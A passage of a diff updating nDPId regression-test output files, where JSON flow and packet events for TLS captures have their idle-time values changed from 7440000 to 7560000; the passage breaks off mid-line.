+00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1252380859885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1252380859885,"pkt":"ABTRQblQABy\/OaVxCABFAACOMQBAAIAG8snAqAplziE9cQ9\/AbtzVLVyvsgCMFAY+vBuTgAAFgMBAGEBAABdAwFKpdC7WffXCrqul0rRyqlV7PYgfbDHC7SZ1YAJU4BSeiCCetHfydzbddwggCw2Ef4Y\/Wcmum3i+DV+RW7iw5bCGwAWAAQABQAKAAkAZABiAAMABgATABIAJQAA"} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1252380859868,"flow_last_seen":1252380859885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1252380859885,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1252380859868,"flow_last_seen":1252380859904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1252380859904,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"53611273a714cb4789c8222932efd5a7","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":7,"total-skipped-flows":0,"total-l4-data-len":1431,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1421985541772} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1421985541772,"pkt":"AAOf2SAhEFbKCIWJCABFAAAyM2VAAH8GFrhKUKBjQ9lNHAy6AbvQcb+g7Sa+J1AY\/QKZOwAlAAMBAAUBAAABAQ=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1252380859868,"flow_last_seen":1252380859943,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7560000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1421985541772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1421985541772,"pkt":"AAOf2SAhEFbKCIWJCABFAAAyM2VAAH8GFrhKUKBjQ9lNHAy6AbvQcb+g7Sa+J1AY\/QKZOwAlAAMBAAUBAAABAQ=="} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7560000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1252380859868,"flow_last_seen":1252380859943,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":8,"total-skipped-flows":0,"total-l4-data-len":1441,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1544035479538} 00195{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479538} 00449{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":118,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":118,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQBsn4EAYAIIAEVoAGDVegAA\/xG3XAruJEAK7vQxCGgIaABMAAAw\/wA8B+zklkUAADyx3UAAQAbcAwq\/ixE23eAt5LgBu\/kVfJ4AAAAAoAL\/\/3GmAAACBAW0BAIICgAUzUMAAAAAAQMDBg=="} @@ -20,7 +20,7 @@ 00444{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":118,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":118,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQAMn4EAAAIIAEVoAGBxLwAAOxHfqAru9DEK7iRACGgIaABMAAAw\/wA8AABhskUAADwAAEAA5Abp4Dbd4C0Kv4sRAbvkuBpaSBv5FXyfoBJxILDEAAACBAV4BAIICh1e0BYAFM1DAQMDCA=="} 00195{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479768} 00723{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":324,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":324,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQBsn4EAYAIIAEVoAS7V9AAA\/xG2FAruJEAK7vQxCGgIaAEaAAAw\/wEKB+zklkUAAOux30AAQAbbUgq\/ixE23eAt5LgBu\/kVfJ8aWkgcgBgFWRb9AAABAQgKABTNax1e0BYWAwEAsgEAAK4DA+Jfj3VZ7Se+llOF2hoK\/0SOWa4JB8kGoFPipHXr6zI3AAAowCvALMAvwDAAngCfwAnACsATwBQAMwA5wAfAEQCcAJ0ALwA1AAUA\/wEAAF0AAAAWABQAABFlLmNyYXNobHl0aWNzLmNvbQAXAAAAIwAAAA0AFgAUBgEGAwUBBQMEAQQDAwEDAwIBAgMAEAALuImlL1Y1GeVflD5H40\/GlDV3w0Q4eHATzs15UMvq3bDFbT9WBxf4WY7WsXHZhuEm\/fgNJZccyFnwUKMb"} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7560000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":8,"total-skipped-flows":0,"total-l4-data-len":1441,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1544035479768} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 12/8 diff --git a/test/results/tls_long_cert.pcap.out b/test/results/tls_long_cert.pcap.out index bd2e6439d..e400dc8cc 100644 --- a/test/results/tls_long_cert.pcap.out +++ b/test/results/tls_long_cert.pcap.out @@ -1,13 +1,13 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_long_cert.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_long_cert.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1553619078033} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1553619078033,"flow_last_seen":1553619078033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1553619078033,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1553619078033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1553619078033,"pkt":"BBjWMe9aeDHBvV4kCABFAABAAABAAEAGN8XAqAJ+aG\/XXesOAbssL+yBAAAAALAC\/\/8wZwAAAgQFtAEDAwYBAQgKJK\/ZdwAAAAAEAgAA"} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1553619078058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1553619078058,"pkt":"eDHBvV4kBBjWMe9aCABFAAA8AABAADYGQclob9ddwKgCfgG76w4xmkZeLC\/sgqAScSAcqQAAAgQFtAQCCArQt2rgJK\/ZdwEDAwc="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1553619078058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1553619078058,"pkt":"BBjWMe9aeDHBvV4kCABFAAA0AABAAEAGN9HAqAJ+aG\/XXesOAbssL+yCMZpGX4AQCAq0dAAAAQEICiSv2Y7Qt2rg"} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1553619078033,"flow_last_seen":1553619078058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1553619078058,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1553619078033,"flow_last_seen":1553619078091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1553619078091,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02429{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1553619078033,"flow_last_seen":1553619078093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":1553619078093,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","server_names":"www.repstatic.it,repstatic.it,amp-video.lastampa.it,www.repubblica.it,amp-video.deejay.it,amp-video.d.repubblica.it,www.gelestatic.it,oasjs.kataweb.it,video.d.repubblica.it,www.test.capital.it,napoli.repubblica.it,video.ilsecoloxix.it,genova.repubblica.it,cdn.gelestatic.it,video.gelocal.it,media.deejay.it,media.m2o.it,amp-video.espresso.repubblica.it,download.gelocal.it,amp-video.m2o.it,bologna.repubblica.it,torino.repubblica.it,scripts.kataweb.it,palermo.repubblica.it,roma.repubblica.it,video.xl.repubblica.it,amp-video.gelocal.it,video.espresso.repubblica.it,www.capital.it,video.limesonline.com,media.capital.it,syndication-vod-pro.akamai.media.kataweb.it,test.capital.it,video.deejay.it,video.repubblica.it,milano.repubblica.it,video.lanuovasardegna.it,video.m2o.it,parma.repubblica.it,video.3nz.it,syndication-vod-hds.akamai.media.kataweb.it,amp-video.repubblica.it,video.lastampa.it,webfragments.repubblica.it,amp-video.xl.repubblica.it,amp-video.limesonline.com,media.kataweb.it,bari.repubblica.it,syndication-vod-hls.akamai.media.kataweb.it,amp-video.3nz.it,syndication3rd-vod-pro.akamai.media.kataweb.it,firenze.repubblica.it,amp-video.ilsecoloxix.it,amp-video.lanuovasardegna.it,cdn.flv.kataweb.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust RSA CA 2018","subjectDN":"C=IT, ST=Roma, L=Roma, O=GEDI Digital S.r.l., CN=www.repstatic.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"0C:9F:21:DB:65:A1:BE:EB:D8:89:38:D3:FF:7A:D9:02:8B:F1:60:A1"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":182,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":182,"flow_first_seen":1553619078033,"flow_last_seen":1553619149372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":105569,"flow_avg_l4_payload_len":580,"midstream":0,"thread_ts_msec":1553619149372,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1553619078033,"flow_last_seen":1553619078033,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1553619078033,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1553619078033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1553619078033,"pkt":"BBjWMe9aeDHBvV4kCABFAABAAABAAEAGN8XAqAJ+aG\/XXesOAbssL+yBAAAAALAC\/\/8wZwAAAgQFtAEDAwYBAQgKJK\/ZdwAAAAAEAgAA"} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1553619078058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1553619078058,"pkt":"eDHBvV4kBBjWMe9aCABFAAA8AABAADYGQclob9ddwKgCfgG76w4xmkZeLC\/sgqAScSAcqQAAAgQFtAQCCArQt2rgJK\/ZdwEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1553619078058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1553619078058,"pkt":"BBjWMe9aeDHBvV4kCABFAAA0AABAAEAGN9HAqAJ+aG\/XXesOAbssL+yCMZpGX4AQCAq0dAAAAQEICiSv2Y7Qt2rg"} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1553619078033,"flow_last_seen":1553619078058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1553619078058,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1553619078033,"flow_last_seen":1553619078091,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1553619078091,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02429{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1553619078033,"flow_last_seen":1553619078093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":1553619078093,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","server_names":"www.repstatic.it,repstatic.it,amp-video.lastampa.it,www.repubblica.it,amp-video.deejay.it,amp-video.d.repubblica.it,www.gelestatic.it,oasjs.kataweb.it,video.d.repubblica.it,www.test.capital.it,napoli.repubblica.it,video.ilsecoloxix.it,genova.repubblica.it,cdn.gelestatic.it,video.gelocal.it,media.deejay.it,media.m2o.it,amp-video.espresso.repubblica.it,download.gelocal.it,amp-video.m2o.it,bologna.repubblica.it,torino.repubblica.it,scripts.kataweb.it,palermo.repubblica.it,roma.repubblica.it,video.xl.repubblica.it,amp-video.gelocal.it,video.espresso.repubblica.it,www.capital.it,video.limesonline.com,media.capital.it,syndication-vod-pro.akamai.media.kataweb.it,test.capital.it,video.deejay.it,video.repubblica.it,milano.repubblica.it,video.lanuovasardegna.it,video.m2o.it,parma.repubblica.it,video.3nz.it,syndication-vod-hds.akamai.media.kataweb.it,amp-video.repubblica.it,video.lastampa.it,webfragments.repubblica.it,amp-video.xl.repubblica.it,amp-video.limesonline.com,media.kataweb.it,bari.repubblica.it,syndication-vod-hls.akamai.media.kataweb.it,amp-video.3nz.it,syndication3rd-vod-pro.akamai.media.kataweb.it,firenze.repubblica.it,amp-video.ilsecoloxix.it,amp-video.lanuovasardegna.it,cdn.flv.kataweb.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, 